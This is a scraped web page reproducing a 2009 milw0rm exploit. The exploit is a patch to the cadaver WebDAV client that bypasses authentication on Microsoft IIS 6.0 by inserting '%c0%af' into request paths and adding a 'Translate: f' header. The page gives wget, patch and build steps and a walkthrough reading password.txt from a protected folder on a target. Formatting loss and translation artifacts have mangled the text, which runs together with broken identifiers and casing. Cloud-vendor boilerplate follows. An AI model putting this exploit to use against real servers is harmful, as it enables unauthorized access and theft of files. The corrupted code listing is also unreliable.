Microsoft IIS 6.0 WebDAV remote auth bypass exploit patch

Source: Internet
Author: User
Tags eol microsoft iis
# Blog with a detailed description: # http://www.skullsecurity.org/blog? P = 285 # And the patch itself: # http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch##> mkdir cadaver-h4x #> Cd cadaver-h4x #> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch# -- snip -- #> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz# -- snip -- #> tar xzvf cadaver-0.23.2.tar.gz # -- snip -- #> Cd cadaver-0.23.2 /#> patch-P1 <.. cadaver-0.23.2-h4x.patch # Patchi Ng file lib/neon/ne_basic.c # patching file lib/neon/ne_request.c # patching file lib/neon/ne_uri.c #>. /configure # -- snip -- #> make # -- snip -- # Now we shoshould have a patched, compiled version of cadaver, so start it # Up With the server that was identified as having a vulnerable folder # earlier: ##>. /cadaver XXX. xxx. xxx. xxx # This shoshould drop you to a "Dav:/>" prompt. now just CD into the # vulnerabl E folder and check out what's there: # Dav:/> Cd Secret # Dav:/secret/> ls # listing collection '/secret/': succeeded. # password.txt 7 May 19 10:40 # Dav:/secret/> CAT password.txt # displaying '/secret/password.txt': # Ron $ pr0ns # Dav: /secret/> # Here's a list of commands that I 've tested that work with the patched # cadaver on a vulnerable Folder: # * CD # ** ls # * move # * put # * Get # * Cat # * deletediff -Rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c --- cadaver-0.23.2/lib/neon/ne_basic.c2008-02-07 16:22:07. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_basic.c2009-05-20 16:13:46. 000000000-0500 @-402,7 + 402,7 @ value = "infinity"; break;}-ne_add_request_header (req, "depth", value); + ne_add_request_header (req, "depth", "1");} static int copy_or_move (ne_session * se SS, int is_move, int overwrite, diff-rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c --- cadaver-0.23.2/lib/neon/ne_request.c2008-01-30 05:35:52. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_request.c2009-05-20 16:35:46. 000000000-0500 @-405, 6 + 405, 7 @ "connection: Te" EOL "te: Trailers" EOL);} + ne_buffer_czappend (req-> headers, "translate: f "EOL);} int ne_accep T_always (void * userdata, ne_request * req, const ne_status * st) @-420,6 + 421,7 @ ne_request * ne_request_create (ne_session * sess, const char * method, const char * path) {+ char * path2 = ne_calloc (strlen (PATH) + 7); ne_request * Req = ne_calloc (sizeof * req); req-> session = sess; @-435,13 + 437,18 @ req-> method = ne_strdup (method); req-> method_is_head = (strcmp (method, "head") = 0 ); + If (strlen (PATH)> 2) + spri Ntf (path2, "% C % C0 % af % s", path [0], path [1], path + 2 ); + else + path2 = path; +/* only use an absoluteuri here when absolutely necessary: Some * servers can't parse them. */-If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path [0] = '/') + If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path2 [0] = '/') req-> uri = ne_concat (req-> session-> scheme ,"://", -req-> session-> server. hostport, path, null); + req-> session-> server. hostport, path2, null); else-req-> uri = ne_strdup (PATH); + req-> uri = ne_strdup (path2); {struct hook * HK; diff-rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c --- cadaver-0.23.2/lib/neon/ne_uri.c2007-12-05 05:04:47. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_uri.c2009-05-20 16:13:46. 000000000-0500 @-+ @/* 0xxx x0 X2 X4 X6 X8 xa xc Xe * // * 0x */OT, ot, OT, ot,/* 1x */OT, ot, OT, ot,-/* 2x */OT, SD, ot, Gd, SD, PC, SD, SD, PS, SD, DS, DT, FS, ++/* 2x */OT, SD, ot, Gd, SD, Al, SD, SD, SD, PS, SD, DS, DT, FS,/* 3x */DG, DG, DG, Cl, SD, ot, SD, ot, Qu,/* 4x */At, Al, al,/* 5x */Al, Al, GD, ot, Gd, ot, US, # milw0rm.com [2009-05-21]

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.